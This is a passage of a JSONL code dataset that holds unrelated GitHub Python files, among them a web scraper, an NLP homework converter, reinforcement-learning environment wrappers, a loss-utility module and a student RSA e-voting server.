csv\n\n\nsource = requests.get(\"http://worldstarhiphop.com/videos/\").text\nsoup = BeautifulSoup(source, \"html5lib\")\n\nwith open(\"wshh_scrape.csv\", \"w\") as world:\n csv_file = csv.writer(world)\n csv_file.writerow([\"Index\", \"Description\", \"Link\"])\n for index, char in enumerate(soup.find_all(\"section\", class_ = \"box\"), start = 1):\n try:\n getInfo = char.find(\"img\", class_ = \"lazy\")[\"alt\"]\n getUrl = char.find(\"a\", itemprop = \"url\", class_ = \"video-box\")[\"href\"]\n url = f\"http://www.worldstarhiphop.com{getUrl}\"\n wshh = str(index) + \") \" + \"Description: \" + getInfo + \"\\n\" + url\n print(wshh)\n print(\"\\n\")\n except:\n getInfo = None\n csv_file.writerow([str(index), getInfo, str(url)])\n\n\n ","repo_name":"iryan6627/Scraping","sub_path":"wshhScrape.py","file_name":"wshhScrape.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71901150828","text":"#!/usr/bin/env python3\n\n\"\"\"\nConverts chaos.html into JSON. A sample of the input:\n\n

Dearest creature in creation
\nStudying English pronunciation,
\n   I will teach you in my verse
\n   Sounds like corpse, corps, horse and worse.

\n\nA hand-formatted portion of the output (note that indentation, line breaks,\norder of dict entries, etc. don't matter as long as the data matches):\n\n[\n ...\n {\"stanza\": 3,\n \"lines\": [\n {\"lineId\": \"3-1\", \"lineNum\": 1, \"text\": \"Pray, console your loving poet,\",\n \"tokens\": [\"Pray\", \",\", \"console\", \"your\", \"loving\", \"poet\"],\n \"rhymeWords\": [\"poet\"]},\n {\"lineId\": \"3-2\", \"lineNum\": 2, \"text\": \"Make my coat look new, dear, sew it!\",\n \"tokens\": [\"Make\", \"my\", \"coat\", \"look\", \"new\", \",\", \"dear\", \",\", \"sew\", \"it\", \"!\"],\n \"rhymeWords\": [\"sew\", \"it\"]},\n ...\n ]},\n ...\n {\"stanza\": 9,\n \"lines\": [\n {\"lineId\": \"9-1\", \"lineNum\": 1, \"text\": \"From \\\"desire\\\": desirable - admirable from \\\"admire\\\",\",\n \"tokens\": [\"From\", \"``\", \"desire\", \"''\", \":\", \"desirable\", \"-\", \"admirable\", \"from\", \"``\", \"admire\", \"''\", \",\"],\n \"rhymeWords\": [\"admire\"]},\n ...\n ...]},\n]\n\n\"\"\"\n\n\n\nimport urllib, json, requests, os, sys, pprint, re\nfrom bs4 import BeautifulSoup\nfrom nltk import *\nfrom nltk.corpus import cmudict\nimport nltk\nfrom collections import OrderedDict\n\n\ncontainer = []\n\n# def hasalpha(token):\n# return # TODO: whether any character in the token is a letter\n\n# regex that breaks an HTML line into parts: line number within the stanza, main portion, spacing\n# LINE_RE = # TODO:\n\n# TODO: read from chaos.html, construct data structure, write to chaos.json\n\n\n\ndef readfile():\n url = \"http://people.cs.georgetown.edu/nschneid/cosc272/f17/a1/chaos.html\"\n home = requests.get(url)\n html = BeautifulSoup(str(BeautifulSoup(home.content, \"html.parser\")).replace(\"
\", \" \").replace(\"\", \"\").split('
')[0], \"lxml\")\n cleanfile(html)\n\ndef cleanfile(html):\n\n regex = r'<\\/?p>||<\\/?xxx4>|<\\/?xxx3>|<\\/?xxx2>|<\\/?xxx1>|<\\/?tt>|\\\\xa0\\\\xa0\\\\xa0'\n\n for index, stanza in enumerate(html.findAll(\"xxx1\")):\n\n split = str(str(stanza.contents).replace('[','').replace(']','').replace('-',' - ')).split(\"\\\\n\")\n edit = [re.sub(regex, ' ', x).strip() for x in split]\n index+=1\n\n lines = []\n\n for Id, line in enumerate(edit):\n rhymeWords = []\n Id+=1\n lineId = str(index) + '-' + str(Id)\n text = BeautifulSoup(line, \"lxml\").text \n tokens = word_tokenize(line)\n copy = word_tokenize(line)\n copy_tokens = [x.strip() for x in copy if x not in ('<', '>', 'i', '/i')]\n tokens = [x.strip().lower() for x in tokens if x != 'i' and (x.isalpha() or re.match(re.compile('[,|;|-]'), x))]\n\n tokens = tokens[::-1]\n\n if tokens[0] in (',' , ';', '-'): \n del tokens[0] \n\n if '-' in tokens[0]:\n tokens[0] = tokens[0].split('-')[1]\n\n if tokens[0] == 'it':\n rhymeWords.append(tokens[1])\n rhymeWords.append(tokens[0])\n else: \n rhymeWords.append(tokens[0])\n\n lines.append({ \"lineId\" : lineId, \"lineNum\" : Id, \"text\" : text, \"tokens\" : copy_tokens, \"rhymeWords\" : rhymeWords })\n\n data = {\"stanza\" : index, \"lines\" : lines}\n dict(data)\n\ndef dict(data):\n container.append(data)\n\ndef ind(array):\n for i, elem in enumerate(array): \n if elem == 'i':\n return i\n\ndef writeJSON():\n if os.path.exists(\"chaos.json\"):\n f = file(\"chaos.json\", \"r+\")\n else:\n f = file(\"chaos.json\", \"w\")\n j = json.dumps(container, indent=4)\n f.write(j)\n f.close()\n\ndef main():\n readfile() \n writeJSON()\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n\n\n\n","repo_name":"derekacosta/NLP","sub_path":"A1 /chaos2json.py","file_name":"chaos2json.py","file_ext":"py","file_size_in_byte":3858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17210631647","text":"import random\n\n\ndef guess(y):\n random_number =random.randint(1,y)\n guess=0\n \n while guess!= random_number:\n guess =int(input(f'Guess a random number from 1 to {y} \\n'))\n if guessrandom_number:\n print(\"too high\")\n \n \n print(f'yay u guessed {random_number}')\n \n \n \ndef computer_guess(x):\n low=1\n high=x\n feedback=''\n \n while feedback!=\"c\":\n if low!= high:\n \n guess=random.randint(low, high)\n else:\n guess=low\n \n feedback=input(f'is {guess} too high (h), too low (l), or correct (c)? ').lower()\n if feedback ==\"h\":\n high=guess -1\n elif feedback==\"l\":\n low=guess+1\n print(f\"yay the computer guessed {guess}\")\n \n \ninitprompt= input(\"Would you like to guess a random number or would you like the computer to guess a number? (me,computer) \").lower()\n\nrange= int(input(\" What is the range of the number? 1-? \"))\n\nif initprompt ==\"me\":\n guess(range)\n \nelse:\n computer_guess(range)","repo_name":"PLAyEr2002002/12-beginner-python-projects","sub_path":"number_guesser.py","file_name":"number_guesser.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71265183147","text":"from __future__ import unicode_literals\n\nfrom django.template import engines\nfrom django.utils.translation import ugettext_lazy as _\nfrom django_jinja.backend import Jinja2\n\nfrom shoop.admin.base import AdminModule, MenuEntry, Notification\nfrom shoop.admin.utils.urls import admin_url\nfrom shoop.xtheme._theme import get_current_theme\nfrom shoop.xtheme.engine import XthemeEnvironment\n\n\nclass XthemeAdminModule(AdminModule):\n \"\"\"\n Admin module for Xtheme.\n\n Allows theme activation/deactivation and further configuration.\n \"\"\"\n name = _(\"Shoop Extensible Theme Engine\")\n breadcrumbs_menu_entry = MenuEntry(_(\"Themes\"), \"shoop_admin:xtheme.config\")\n\n def get_urls(self): # doccov: ignore\n return [\n admin_url(\n \"^xtheme/(?P.+?)/\",\n \"shoop.xtheme.admin_module.views.ThemeConfigDetailView\",\n name=\"xtheme.config_detail\"\n ),\n admin_url(\n \"^xtheme/\",\n \"shoop.xtheme.admin_module.views.ThemeConfigView\",\n name=\"xtheme.config\"\n )\n ]\n\n def get_menu_category_icons(self):\n return {self.name: \"fa fa-paint-brush\"}\n\n def get_menu_entries(self, request): # doccov: ignore\n return [\n MenuEntry(\n text=_(\"Themes\"), icon=\"fa fa-paint-brush\",\n url=\"shoop_admin:xtheme.config\",\n category=self.name\n )\n ]\n\n def get_notifications(self, request):\n try:\n engine = engines[\"jinja2\"]\n except KeyError:\n engine = None\n\n if engine and isinstance(engine, Jinja2): # The engine is what we expect...\n if isinstance(engine.env, XthemeEnvironment): # ... and it's capable of loading themes...\n if not get_current_theme(request): # ... but there's no theme active?!\n # Panic!\n yield Notification(\n text=_(\"No theme is active. Click here to activate one.\"),\n title=_(\"Theming\"),\n url=\"shoop_admin:xtheme.config\"\n )\n","repo_name":"if413019/ShoopDevelopment","sub_path":"shoop/xtheme/admin_module/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10745025747","text":"\nfrom pylib import namedtuple\n\nWEIGHT_LIGHT = 1\nWEIGHT_HEAVY = 2\nWEIGHT_FIXED = 3\n\nclass Model(object):\n def __init__(self, style, shape, pos, mark):\n self.style = style\n self.shape = shape\n self.pos = pos\n self.mark = mark\n\n def is_unit(self):\n return self.style.is_unit\n\n def get_weight(self):\n return self.style.weight\n\n def is_fixed(self):\n return self.get_weight() == WEIGHT_FIXED\n\n def is_immovable(self):\n return self.is_fixed() or self.is_unit()\n\n def should_go_out(self):\n return self.is_unit()\n\n def is_out(self):\n \"\"\"Returns whether the model left the room.\n \"\"\"\n x, y = self.pos\n return x < 0\n\n def __repr__(self):\n return \"%s:%s\" % (self.mark, self.pos)\n\ndef parse_models(maze):\n models = []\n for style, marks in STYLE_MARKS.iteritems():\n for mark in marks:\n positions = maze.find_positions(mark)\n if len(positions) == 0:\n continue\n pos, shape = _normalize_shape(positions)\n models.append(Model(style, shape, pos, mark))\n\n return models\n\ndef _normalize_shape(positions):\n \"\"\"Returns the first position\n and a list of offests from it.\n \"\"\"\n pos = positions[0]\n x, y = pos\n shape = []\n for x2, y2 in positions:\n dx = x2 - x\n dy = y2 - y\n shape.append((dx,dy))\n\n return pos, shape\n\ndef find_model(models, mark):\n \"\"\"Finds the model with the given mark.\n \"\"\"\n for model in models:\n if model.mark == mark:\n return model\n\n return None\n\ndef _chars(start, end):\n \"\"\"Returns a string with chars the from [start-end] set.\n \"\"\"\n return \"\".join(chr(i) for i in range(ord(start), ord(end) + 1))\n\nStyle = namedtuple.namedtuple(\"Style\", \"weight is_unit\")\nSTYLE_FIXED = Style(WEIGHT_FIXED, False)\nSTYLE_SMALL_FISH = Style(WEIGHT_LIGHT, True)\nSTYLE_BIG_FISH = Style(WEIGHT_HEAVY, True)\nSTYLE_LIGHT = Style(WEIGHT_LIGHT, False)\nSTYLE_HEAVY = Style(WEIGHT_HEAVY, False)\n\nSTYLE_MARKS = {\n STYLE_FIXED: \"#\",\n STYLE_SMALL_FISH: \"+0123456789\",\n STYLE_BIG_FISH: \"*\",\n STYLE_LIGHT: _chars(\"a\", \"z\"),\n STYLE_HEAVY: _chars(\"A\", \"Z\"),\n }\n\n","repo_name":"fidlej/sokobot","sub_path":"soko/env/fillets/parsing.py","file_name":"parsing.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72379261547","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport sonnet as snt\nimport tensorflow.compat.v1 as tf\n\n\nclass MovingAverage(snt.AbstractModule):\n \"\"\"A thin wrapper around snt.MovingAverage.\n\n The module adds the option not to differentiate through the last element that\n is added to the moving average, specified by means of the kwarg\n `differentiable`.\n \"\"\"\n\n def __init__(self, decay, local=True, differentiable=False,\n name='snt_moving_average'):\n super(MovingAverage, self).__init__(name=name)\n self._differentiable = differentiable\n self._moving_average = snt.MovingAverage(\n decay=decay, local=local, name=name)\n\n def _build(self, inputs):\n if not self._differentiable:\n inputs = tf.stop_gradient(inputs)\n return self._moving_average(inputs)\n\n\nclass LagrangeMultiplier(snt.AbstractModule):\n \"\"\"A lagrange multiplier sonnet module.\"\"\"\n\n def __init__(self,\n rate=1e-2,\n name='snt_lagrange_multiplier'):\n \"\"\"Initializer for the sonnet module.\n\n Args:\n rate: Scalar used to scale the magnitude of gradients of the Lagrange\n multipliers, defaulting to 1e-2.\n name: Name of the Lagrange multiplier sonnet module.\n \"\"\"\n super(LagrangeMultiplier, self).__init__(name=name)\n self._rate = rate\n\n def _build(self, ma_constraint):\n \"\"\"Connects the module to the graph.\n\n Args:\n ma_constraint: A loss minus a target value, denoting a constraint that\n shall be less or equal than zero.\n\n Returns:\n An op, which when added to a loss and calling minimize on the loss\n results in the optimizer minimizing w.r.t. to the model's parameters and\n maximizing w.r.t. the Lagrande multipliers, hence enforcing the\n constraints.\n \"\"\"\n lagmul = snt.get_lagrange_multiplier(\n shape=ma_constraint.shape, rate=self._rate,\n initializer=np.ones(ma_constraint.shape))\n return lagmul\n\n\ndef _sample_gumbel(shape, eps=1e-20):\n \"\"\"Transforms a uniform random variable to be standard Gumbel distributed.\"\"\"\n\n return -tf.log(\n -tf.log(tf.random_uniform(shape, minval=0, maxval=1) + eps) + eps)\n\n\ndef _topk_mask(score, k):\n \"\"\"Returns a mask for the top-k elements in score.\"\"\"\n\n _, indices = tf.nn.top_k(score, k=k)\n return tf.scatter_nd(tf.expand_dims(indices, -1), tf.ones(k),\n tf.squeeze(score).shape.as_list())\n\n\ndef ce_loss(logits, labels, mask=None, top_k_percentage=None,\n deterministic=False):\n \"\"\"Computes the cross-entropy loss.\n\n Optionally a mask and a top-k percentage for the used pixels can be specified.\n\n The top-k mask can be produced deterministically or sampled.\n Args:\n logits: A tensor of shape (b,h,w,num_classes)\n labels: A tensor of shape (b,h,w,num_classes)\n mask: None or a tensor of shape (b,h,w).\n top_k_percentage: None or a float in (0.,1.]. If None, a standard\n cross-entropy loss is calculated.\n deterministic: A Boolean indicating whether or not to produce the\n prospective top-k mask deterministically.\n\n Returns:\n A dictionary holding the mean and the pixelwise sum of the loss for the\n batch as well as the employed loss mask.\n \"\"\"\n num_classes = logits.shape.as_list()[-1]\n y_flat = tf.reshape(logits, (-1, num_classes), name='reshape_y')\n t_flat = tf.reshape(labels, (-1, num_classes), name='reshape_t')\n if mask is None:\n mask = tf.ones(shape=(t_flat.shape.as_list()[0],))\n else:\n assert mask.shape.as_list()[:3] == labels.shape.as_list()[:3],\\\n 'The loss mask shape differs from the target shape: {} vs. {}.'.format(\n mask.shape.as_list(), labels.shape.as_list()[:3])\n mask = tf.reshape(mask, (-1,), name='reshape_mask')\n\n n_pixels_in_batch = y_flat.shape.as_list()[0]\n xe = tf.nn.softmax_cross_entropy_with_logits_v2(labels=t_flat, logits=y_flat)\n\n if top_k_percentage is not None:\n assert 0.0 < top_k_percentage <= 1.0\n k_pixels = tf.cast(tf.floor(n_pixels_in_batch * top_k_percentage), tf.int32)\n\n stopgrad_xe = tf.stop_gradient(xe)\n norm_xe = stopgrad_xe / tf.reduce_sum(stopgrad_xe)\n\n if deterministic:\n score = tf.log(norm_xe)\n else:\n # Use the Gumbel trick to sample the top-k pixels, equivalent to sampling\n # from a categorical distribution over pixels whose probabilities are\n # given by the normalized cross-entropy loss values. This is done by\n # adding Gumbel noise to the logarithmic normalized cross-entropy loss\n # (followed by choosing the top-k pixels).\n score = tf.log(norm_xe) + _sample_gumbel(norm_xe.shape.as_list())\n\n score = score + tf.log(mask)\n top_k_mask = _topk_mask(score, k_pixels)\n mask = mask * top_k_mask\n\n # Calculate batch-averages for the sum and mean of the loss\n batch_size = labels.shape.as_list()[0]\n xe = tf.reshape(xe, shape=(batch_size, -1))\n mask = tf.reshape(mask, shape=(batch_size, -1))\n ce_sum_per_instance = tf.reduce_sum(mask * xe, axis=1)\n ce_sum = tf.reduce_mean(ce_sum_per_instance, axis=0)\n ce_mean = tf.reduce_sum(mask * xe) / tf.reduce_sum(mask)\n\n return {'mean': ce_mean, 'sum': ce_sum, 'mask': mask}\n","repo_name":"deepmind/deepmind-research","sub_path":"hierarchical_probabilistic_unet/geco_utils.py","file_name":"geco_utils.py","file_ext":"py","file_size_in_byte":5209,"program_lang":"python","lang":"en","doc_type":"code","stars":11900,"dataset":"github-code","pt":"37"} +{"seq_id":"362690829","text":"'''\nused to copy sampled frames to a new folder. \nuseful for transfering data across computers.\n'''\n\nimport os\nimport sys\nimport shutil\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nsys.path.append(BASE_DIR)\n\nfrom config import TARGET\nSCANS = sorted(os.listdir(TARGET))\nTRAIN_FRAMES = os.path.join(BASE_DIR, \"sampled_train_25.txt\")\nVAL_FRAMES = os.path.join(BASE_DIR, \"sampled_val_25.txt\")\n\n# ---------------------------------------------------\n# the path to save, please update!\nSAVE = None\n# ---------------------------------------------------\n\ndef copy_images(log):\n with open(log, \"r\") as f:\n files = f.read().splitlines()\n for i, l in enumerate(files):\n # depth\n src = os.path.join(TARGET, l+\".png\")\n # rgb\n src2 = os.path.join(TARGET, l+\".color.jpg\")\n # pose\n pose = os.path.join(TARGET, l+\".pose.txt\")\n # destination\n dst = os.path.join(SAVE, l.split(\"/\")[0])\n shutil.copy2(src, dst)\n shutil.copy2(src2, dst)\n shutil.copy2(pose, dst)\n if i%1000 == 0:\n print(\"... {:d} frames copied\".format(i))\n\n\ndef main():\n # create sub folders\n for s in SCANS:\n f = os.path.join(SAVE, s)\n if not os.path.exists(f):\n os.mkdir(f)\n\n # copy calibrations\n for s in SCANS:\n f = os.path.join(SAVE, s)\n c = os.path.join(TARGET, s, \"_info.txt\")\n shutil.copy2(c, f)\n\n # copy depth maps and rgb images\n copy_images(TRAIN_FRAMES)\n copy_images(VAL_FRAMES)\n print(\"ok\")\n\n\nif __name__ == \"__main__\":\n main()\n ","repo_name":"lilanxiao/Invar3D","sub_path":"scannet/save_sampled.py","file_name":"save_sampled.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"29959138918","text":"import argparse\nimport json\nimport jsonschema\nimport sys\n\n\ndef validate_json(schema_json, replay_json):\n \"\"\"\n Validate the replay file against the provided schema.\n \"\"\"\n try:\n jsonschema.validate(instance=replay_json, schema=schema_json)\n except jsonschema.ValidationError:\n print(\"The replay file does not validate against the schema.\")\n return False\n else:\n return True\n\n\ndef verify_there_was_a_transaction(replay_json):\n \"\"\"\n Verify that the replay file has a sensible looking transaction.\n \"\"\"\n try:\n transactions = replay_json['sessions'][0]['transactions']\n except KeyError:\n print(\"The replay file did not have transactions in it.\")\n return False\n\n if len(transactions) < 1:\n print(\"There are no transactions in the replay file.\")\n return False\n transaction = transactions[0]\n if not ('client-request' in transaction and 'server-response' in transaction):\n print(\"There was not request and response in the transaction of the replay file.\")\n return False\n\n return True\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"schema_file\",\n type=argparse.FileType('r'),\n help=\"The schema in which to interpret validate the replay file.\")\n parser.add_argument(\"replay_file\",\n type=argparse.FileType('r'),\n help=\"The replay file to validate.\")\n return parser.parse_args()\n\n\ndef main():\n args = parse_args()\n\n schema_json = json.load(args.schema_file)\n replay_json = json.load(args.replay_file)\n\n if not validate_json(schema_json, replay_json):\n return 1\n\n # Verifying that there is a transaction in the replay file may seem\n # unnecessary since the replay file validated against the schema. But a JSON\n # file that doesn't have conflicting entry names will pass the schema. For\n # instance, this passes against our replay schema:\n #\n # {\"name\": \"Bob\", \"languages\": [\"English\", \"French\"]}\n #\n # Thus we do the following sanity check to make sure that the replay file\n # appears to have some transaction in it.\n if not verify_there_was_a_transaction(replay_json):\n return 1\n\n return 0\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"ezelkow1/ATS-TEST","sub_path":"tests/gold_tests/pluginTest/traffic_dump/verify_replay.py","file_name":"verify_replay.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31667420731","text":"import os, sys, argparse\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--word', '-w')\nparser.add_argument('--folder', '-f')\nparser.add_argument('--mode', '-m')\nargs = parser.parse_args(sys.argv[1:])\n\ndef main(word, folder, mode):\n if mode == 'titles':\n print(titles(word, folder))\n else:\n print(content(word, folder))\n\ndef titles(word, folder):\n list_titles = []\n count = 0\n for root, dirs, files in os.walk(folder):\n [list_titles.append(i) for i in dirs]\n [list_titles.append(i) for i in files]\n for i in list_titles:\n if word.lower() in i.lower():\n count += 1\n return count\n\ndef content(word, folder):\n list_files = []\n count = 0\n for root, dirs, files in os.walk(folder):\n for name in files:\n list_files.append(root + '/' + name)\n for f in list_files:\n with open(f, 'r') as file:\n try:\n for line in file.readlines():\n count += line.lower().count(word.lower())\n except:\n pass\n return count\n\n\nmain(args.word, args.folder, args.mode)\n\n# Search in titles:\n# python3 script.py -w [word] -f [folder] -m titles\n# Search in files:\n# python3 script.py -w [word] -f [folder]\n","repo_name":"bukhtinicheva/python_project","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32591368315","text":"import pymysql.cursors\nimport random\nimport string\nimport sys\nimport socket\nimport time\nimport multiprocessing\nimport hashlib\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Util.number import *\n\ntime.clock = time.process_time\n\nprojects = [[]]*6\nprojects[1] = [1,2,3,4,5,6]\nprojects[3] = [1,2,5,6]\nprojects[4] = [1,2,4,5,6]\nprojects[5] = [1,2,3,5,6]\n\nskey = RSA.generate(1024)\n\ndef server(conn):\n try:\n flag = conn.recv(1).decode() \n connection = pymysql.connect(host='localhost',\n port=8888,\n user='root',\n password='supersecret',\n database='crypto_final',\n cursorclass=pymysql.cursors.DictCursor)\n\n if flag == '1':\n username = conn.recv(1024).decode()\n password = conn.recv(1024).decode()\n \n with connection:\n with connection.cursor() as cursor:\n sql = \"SELECT `password` FROM `users` WHERE `username`=%s\"\n cursor.execute(sql, (username,))\n result = cursor.fetchone()\n if result['password'] != hashlib.sha256(password.encode()).hexdigest():\n exit()\n \n time.sleep(0.01)\n conn.send(str(skey.e).encode())\n time.sleep(0.01)\n conn.send(str(skey.n).encode())\n\n valid_projects = ''\n for i in range(len(projects)):\n if len(projects[i]) != 0:\n with connection.cursor() as cursor:\n sql = \"SELECT * FROM `signatures` WHERE `username`=%s and `projectID`=%s\"\n cursor.execute(sql, (username, i))\n result = cursor.fetchone()\n if not result:\n valid_projects += '.'+str(i)\n\n valid_projects = valid_projects[1:]\n time.sleep(0.01)\n conn.send(valid_projects.encode())\n valid_projects = valid_projects.split('.')\n valid_projects = [int(i) for i in valid_projects]\n\n ticket = conn.recv(1024).decode()\n project_id = int(ticket[:ticket.find('00000')])\n ticket = int(ticket)\n if project_id not in valid_projects:\n exit()\n\n sig_ticket = pow(ticket, skey.d, skey.n)\n time.sleep(0.01)\n conn.send(str(sig_ticket).encode())\n \n options = \"\"\n for i in projects[project_id]:\n options += '.'+str(i)\n options = options[1:]\n time.sleep(0.01)\n conn.send(options.encode())\n \n pkc = int(conn.recv(1024).decode())\n sig_pkc = pow(pkc, skey.d, skey.n)\n time.sleep(0.01)\n conn.send(str(sig_pkc).encode())\n \n with connection.cursor() as cursor:\n sql = \"INSERT INTO `signatures` (`username`, `projectID`, `sigPKC`) VALUES (%s, %s, %s)\"\n cursor.execute(sql, (username, project_id, str(sig_pkc)))\n connection.commit()\n\n elif flag == '2':\n option = int(conn.recv(1024).decode())\n pkc = int(conn.recv(1024).decode())\n sig_ticket = int(conn.recv(1024).decode())\n sig_pkc = int(conn.recv(1024).decode())\n sig_hoption = int(conn.recv(1024).decode())\n sig_pkc1 = pow(pkc, skey.d, skey.n)\n sig_pkc2 = sig_pkc\n\n ticket = str(pow(sig_ticket, skey.e, skey.n))\n project_id = int(ticket[:ticket.find('00000')])\n \n if option not in projects[project_id]:\n exit()\n\n if sig_pkc1 != sig_pkc2:\n exit()\n\n hoption1 = pow(sig_hoption, int(str(pkc)[-5:]), int(str(pkc)[:-5]))\n hoption2 = int(hashlib.sha256(str(option).encode()).hexdigest(), 16)\n if hoption1 != hoption2:\n exit()\n\n with connection:\n with connection.cursor() as cursor:\n sql = \"SELECT * FROM `votes` WHERE `PKC`=%s\"\n cursor.execute(sql, (str(pkc)))\n result = cursor.fetchone()\n if result:\n exit()\n\n with connection.cursor() as cursor:\n sql = \"INSERT INTO `votes` (`projectID`, `optionID`, `PKC`, `sigHoption`) VALUES (%s, %s, %s, %s)\"\n cursor.execute(sql, (project_id, option, str(pkc), str(sig_hoption)))\n connection.commit()\n conn.send('Success'.encode())\n\n elif flag == '3':\n project_list = ''\n for i in range(len(projects)):\n if len(projects[i]) != 0:\n project_list += '.'+str(i)\n project_list = project_list[1:]\n conn.send(project_list.encode())\n project_id = int(conn.recv(1024).decode())\n if not str(project_id) in project_list.split('.'):\n exit()\n\n with connection:\n with connection.cursor() as cursor:\n sql = \"SELECT * FROM `votes` WHERE `projectID`=%s\"\n cursor.execute(sql, project_id)\n result = cursor.fetchall()\n conn.send(str(result).encode())\n \n else:\n print('bye')\n\n except ConnectionResetError:\n conn.close()\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\ns.bind(('0.0.0.0', 7777))\ns.listen(10)\n\nwhile True:\n conn, addr = s.accept()\n m = multiprocessing.Process(target=server, args=(conn,))\n m.daemon = True\n m.start()\n\n","repo_name":"ycl-lcy/crypto_evoting","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":6022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24422771753","text":"from typing import Literal, Tuple, TypedDict\n\nimport gymnasium as gym\nimport numpy as np\nfrom gymnasium import spaces\nfrom procgen import ProcgenGym3Env\nfrom ray.tune.registry import register_env\n\n\nclass BaseProcgenEnvConfig(TypedDict):\n env_name: str\n distribution_mode: Literal[\"easy\", \"hard\", \"exploration\"]\n frameskip: int\n num_actions: int\n\n\nclass ProcgenEnvConfig(BaseProcgenEnvConfig):\n num_levels: int\n start_level: int\n\n\nclass ProcgenEnv(gym.Env):\n def __init__(self, config: ProcgenEnvConfig, horizon: float = np.inf, **kwargs):\n kwargs.update(\n {\n \"num\": 1,\n \"env_name\": config[\"env_name\"],\n \"distribution_mode\": config[\"distribution_mode\"],\n \"rand_seed\": 0,\n }\n )\n if config[\"distribution_mode\"] != \"exploration\":\n kwargs.update(\n {\n \"num_levels\": config[\"num_levels\"],\n \"start_level\": config[\"start_level\"],\n }\n )\n self.env = ProcgenGym3Env(**kwargs)\n self.frameskip = config[\"frameskip\"]\n self.horizon = horizon\n self.action_space = spaces.Discrete(config[\"num_actions\"])\n self.observation_space = spaces.Box(\n low=0,\n high=1,\n shape=self.env.ob_space[\"rgb\"].shape,\n )\n\n def reset(self, *args, **kwargs):\n reward, base_obs, first = self.env.observe()\n while not first[0]:\n self.env.act(np.array([0]))\n reward, base_obs, first = self.env.observe()\n self.done = False\n self.t = 0\n return self._get_obs(base_obs), {}\n\n def _get_obs(self, base_obs):\n return base_obs[\"rgb\"][0] / 255\n\n def step(self, action: int) -> Tuple[np.ndarray, float, bool, bool, dict]:\n if self.done:\n reward, base_obs, first = self.env.observe()\n return self._get_obs(base_obs), 0.0, self.done, False, {}\n\n total_reward = 0.0\n for _ in range(self.frameskip):\n self.env.act(np.array([action]))\n reward, base_obs, first = self.env.observe()\n total_reward += reward[0]\n\n if first[0]:\n self.done = True\n break\n\n self.t += 1\n if self.t >= self.horizon:\n self.done = True\n\n return self._get_obs(base_obs), total_reward, self.done, False, {}\n\n def render(self, mode=\"human\"):\n assert mode == \"rgb_array\"\n reward, base_obs, first = self.env.observe()\n return self._get_obs(base_obs)\n\n\nregister_env(\"procgen\", ProcgenEnv)\n\n\nclass DeterministicProcgenEnvConfig(BaseProcgenEnvConfig):\n level: int\n horizon: int\n\n\nclass DeterministicProcgenEnv(ProcgenEnv):\n def __init__(self, config: DeterministicProcgenEnvConfig, **kwargs):\n nondeterministic_config: ProcgenEnvConfig = {\n \"env_name\": config[\"env_name\"],\n \"distribution_mode\": config[\"distribution_mode\"],\n \"frameskip\": config[\"frameskip\"],\n \"num_actions\": config[\"num_actions\"],\n \"start_level\": config[\"level\"],\n \"num_levels\": 1,\n }\n super().__init__(nondeterministic_config, horizon=config[\"horizon\"], **kwargs)\n self.start_state = self.env.get_state()\n\n def reset(self, *args, **kwargs):\n self.env.set_state(self.start_state)\n reward, base_obs, first = self.env.observe()\n assert first[0] and reward[0] == 0\n self.done = False\n self.t = 0\n return self._get_obs(base_obs), {}\n","repo_name":"cassidylaidlaw/effective-horizon","sub_path":"effective_horizon/envs/procgen.py","file_name":"procgen.py","file_ext":"py","file_size_in_byte":3586,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"37"} +{"seq_id":"4198856791","text":"# https://leetcode.com/problems/average-of-levels-in-binary-tree\n\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def averageOfLevels(self, root: TreeNode) -> List[float]:\n result = []\n tobeTraversed = [root]\n \n while(tobeTraversed):\n sum = 0\n length = 0\n nextLevel = []\n \n while(tobeTraversed):\n node = tobeTraversed.pop(0)\n sum += node.val\n length += 1\n if(node.left):\n nextLevel.append(node.left)\n if(node.right):\n nextLevel.append(node.right)\n tobeTraversed = nextLevel\n result.append(sum/length) \n \n return result\n \n","repo_name":"DucNgn/Grinding","sub_path":"637.py","file_name":"637.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10352640832","text":"\"\"\"A simple web application using epubmangler\"\"\"\n\nimport os\nimport re\nimport shutil\nimport time\nimport uuid\n\nimport uvicorn\n\nfrom multiprocessing import Process\nfrom pathlib import Path\nfrom xml.etree.ElementTree import Element\n\nfrom 